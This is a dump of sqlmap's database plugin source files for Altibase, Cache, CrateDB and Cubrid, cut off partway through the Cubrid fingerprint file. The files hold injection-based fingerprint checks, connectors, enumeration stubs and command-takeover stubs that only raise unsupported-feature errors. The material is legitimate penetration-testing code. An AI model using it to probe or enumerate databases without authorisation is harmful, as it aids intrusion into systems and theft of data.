  {
    "path": "sqlmap/plugins/dbms/altibase/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import ALTIBASE_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\n\nfrom plugins.dbms.altibase.enumeration import Enumeration\nfrom plugins.dbms.altibase.filesystem import Filesystem\nfrom plugins.dbms.altibase.fingerprint import Fingerprint\nfrom plugins.dbms.altibase.syntax import Syntax\nfrom plugins.dbms.altibase.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass AltibaseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines Altibase methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = ALTIBASE_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.ALTIBASE] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/altibase/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    def connect(self):\n        errMsg = \"on Altibase it is not (currently) possible to establish a \"\n        errMsg += \"direct connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/altibase/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getStatements(self):\n        warnMsg = \"on Altibase it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def getHostname(self):\n        warnMsg = \"on Altibase it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/altibase/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    pass\n"
  },
  {
    "path": "sqlmap/plugins/dbms/altibase/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import ALTIBASE_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.ALTIBASE)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.ALTIBASE\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(ALTIBASE_ALIASES):\n            setDbms(DBMS.ALTIBASE)\n\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.ALTIBASE\n        logger.info(infoMsg)\n\n        # Reference: http://support.altibase.com/fileDownload.do?gubun=admin&no=228\n        result = inject.checkBooleanExpression(\"CHOSUNG(NULL) IS NULL\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.ALTIBASE\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"TDESENCRYPT(NULL,NULL) IS NULL\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.ALTIBASE\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.ALTIBASE)\n\n            self.getBanner()\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.ALTIBASE\n            logger.warning(warnMsg)\n\n            return False\n"
  },
  {
    "path": "sqlmap/plugins/dbms/altibase/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"||\".join(\"CHR(%d)\" % _ for _ in getOrds(value))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/altibase/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on Altibase it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on Altibase it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on Altibase it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on Altibase it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cache/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import CACHE_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\n\nfrom plugins.dbms.cache.enumeration import Enumeration\nfrom plugins.dbms.cache.filesystem import Filesystem\nfrom plugins.dbms.cache.fingerprint import Fingerprint\nfrom plugins.dbms.cache.syntax import Syntax\nfrom plugins.dbms.cache.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass CacheMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines Cache methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = CACHE_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.CACHE] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cache/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import jaydebeapi\n    import jpype\nexcept:\n    pass\n\nimport logging\n\nfrom lib.core.common import checkFile\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import readInput\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/\n    User guide: https://pypi.python.org/pypi/JayDeBeApi/#usage & http://jpype.sourceforge.net/doc/user-guide/userguide.html\n    API: -\n    Debian package: -\n    License: LGPL & Apache License 2.0\n    \"\"\"\n\n    def connect(self):\n        self.initConnection()\n        try:\n            msg = \"please enter the location of 'cachejdbc.jar'? \"\n            jar = readInput(msg)\n            checkFile(jar)\n            args = \"-Djava.class.path=%s\" % jar\n            jvm_path = jpype.getDefaultJVMPath()\n            jpype.startJVM(jvm_path, args)\n        except Exception as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        try:\n            driver = 'com.intersys.jdbc.CacheDriver'\n            connection_string = 'jdbc:Cache://%s:%d/%s' % (self.hostname, self.port, self.db)\n            self.connector = jaydebeapi.connect(driver, connection_string, str(self.user), str(self.password))\n        except Exception as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except Exception as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) '%s'\" % getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        retVal = False\n\n        try:\n            self.cursor.execute(query)\n            retVal = True\n        except Exception as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) '%s'\" % getSafeExString(ex))\n\n        self.connector.commit()\n\n        return retVal\n\n    def select(self, query):\n        self.execute(query)\n        return self.fetchall()\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cache/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom lib.core.settings import CACHE_DEFAULT_SCHEMA\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getCurrentDb(self):\n        return CACHE_DEFAULT_SCHEMA\n\n    def getUsers(self):\n        warnMsg = \"on Cache it is not possible to enumerate the users\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def getPasswordHashes(self):\n        warnMsg = \"on Cache it is not possible to enumerate password hashes\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getPrivileges(self, *args, **kwargs):\n        warnMsg = \"on Cache it is not possible to enumerate the user privileges\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getStatements(self):\n        warnMsg = \"on Cache it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def getRoles(self, *args, **kwargs):\n        warnMsg = \"on Cache it is not possible to enumerate the user roles\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getHostname(self):\n        warnMsg = \"on Cache it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cache/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    pass\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cache/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.common import hashDBRetrieve\nfrom lib.core.common import hashDBWrite\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import FORK\nfrom lib.core.enums import HASHDB_KEYS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import CACHE_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.CACHE)\n\n    def getFingerprint(self):\n        fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK)\n\n        if fork is None:\n            if inject.checkBooleanExpression(\"$ZVERSION LIKE '%IRIS%'\"):\n                fork = FORK.IRIS\n            else:\n                fork = \"\"\n\n            hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork)\n\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.CACHE\n            if fork:\n                value += \" (%s fork)\" % fork\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        if fork:\n            value += \"\\n%sfork fingerprint: %s\" % (blank, fork)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(CACHE_ALIASES):\n            setDbms(DBMS.CACHE)\n\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.CACHE\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"$LISTLENGTH(NULL) IS NULL\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.CACHE\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"%EXTERNAL %INTERNAL NULL IS NULL\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.CACHE\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.CACHE)\n\n            self.getBanner()\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.CACHE\n            logger.warning(warnMsg)\n\n            return False\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cache/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> from lib.core.common import Backend\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"||\".join(\"CHAR(%d)\" % _ for _ in getOrds(value))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cache/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on Cache it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on Cache it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on Cache it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on Cache it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cratedb/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import CRATEDB_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\n\nfrom plugins.dbms.cratedb.enumeration import Enumeration\nfrom plugins.dbms.cratedb.filesystem import Filesystem\nfrom plugins.dbms.cratedb.fingerprint import Fingerprint\nfrom plugins.dbms.cratedb.syntax import Syntax\nfrom plugins.dbms.cratedb.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass CrateDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines CrateDB methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = CRATEDB_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.CRATEDB] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cratedb/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import psycopg2\n    import psycopg2.extensions\n    psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)\n    psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY)\nexcept:\n    pass\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: http://initd.org/psycopg/\n    User guide: http://initd.org/psycopg/docs/\n    API: http://initd.org/psycopg/docs/genindex.html\n    Debian package: python-psycopg2\n    License: GPL\n\n    Possible connectors: http://wiki.python.org/moin/PostgreSQL\n    \"\"\"\n\n    def connect(self):\n        self.initConnection()\n\n        try:\n            self.connector = psycopg2.connect(host=self.hostname, user=self.user, password=self.password, database=self.db, port=self.port)\n        except psycopg2.OperationalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.connector.set_client_encoding('UNICODE')\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except psycopg2.ProgrammingError as ex:\n            logger.warning(getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        retVal = False\n\n        try:\n            self.cursor.execute(query)\n            retVal = True\n        except (psycopg2.OperationalError, psycopg2.ProgrammingError) as ex:\n            logger.warning((\"(remote) '%s'\" % getSafeExString(ex)).strip())\n        except psycopg2.InternalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.connector.commit()\n\n        return retVal\n\n    def select(self, query):\n        retVal = None\n\n        if self.execute(query):\n            retVal = self.fetchall()\n\n        return retVal\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cratedb/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getPasswordHashes(self):\n        warnMsg = \"on CrateDB it is not possible to enumerate the user password hashes\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getRoles(self, *args, **kwargs):\n        warnMsg = \"on CrateDB it is not possible to enumerate the user roles\"\n        logger.warning(warnMsg)\n\n        return {}\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cratedb/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    pass\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cratedb/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import CRATEDB_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.CRATEDB)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.CRATEDB\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(CRATEDB_ALIASES):\n            setDbms(DBMS.CRATEDB)\n\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.CRATEDB\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"IGNORE3VL(NULL IS NULL)\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.CRATEDB\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"1~1\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.CRATEDB\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.CRATEDB)\n\n            self.getBanner()\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.CRATEDB\n            logger.warning(warnMsg)\n\n            return False\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cratedb/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT 'abcdefgh' FROM foobar\"\n        True\n        \"\"\"\n\n        return expression\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cratedb/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on CrateDB it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on CrateDB it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on CrateDB it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on CrateDB it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cubrid/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import CUBRID_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\n\nfrom plugins.dbms.cubrid.enumeration import Enumeration\nfrom plugins.dbms.cubrid.filesystem import Filesystem\nfrom plugins.dbms.cubrid.fingerprint import Fingerprint\nfrom plugins.dbms.cubrid.syntax import Syntax\nfrom plugins.dbms.cubrid.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass CubridMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines Cubrid methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = CUBRID_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.CUBRID] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cubrid/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import CUBRIDdb\nexcept:\n    pass\n\nimport logging\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: https://github.com/CUBRID/cubrid-python\n    User guide: https://github.com/CUBRID/cubrid-python/blob/develop/README.md\n    API: https://www.python.org/dev/peps/pep-0249/\n    License: BSD License\n    \"\"\"\n\n    def connect(self):\n        self.initConnection()\n\n        try:\n            self.connector = CUBRIDdb.connect(hostname=self.hostname, username=self.user, password=self.password, database=self.db, port=self.port, connect_timeout=conf.timeout)\n        except CUBRIDdb.DatabaseError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except CUBRIDdb.DatabaseError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        try:\n            self.cursor.execute(query)\n        except CUBRIDdb.DatabaseError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n        except CUBRIDdb.Error as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.connector.commit()\n\n    def select(self, query):\n        self.execute(query)\n        return self.fetchall()\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cubrid/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getPasswordHashes(self):\n        warnMsg = \"on Cubrid it is not possible to enumerate password hashes\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getStatements(self):\n        warnMsg = \"on Cubrid it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def getRoles(self, *args, **kwargs):\n        warnMsg = \"on Cubrid it is not possible to enumerate the user roles\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getHostname(self):\n        warnMsg = \"on Cubrid it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cubrid/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    pass\n"
  },
  {
    "path": "sqlmap/plugins/dbms/cubrid/fingerprint.py",
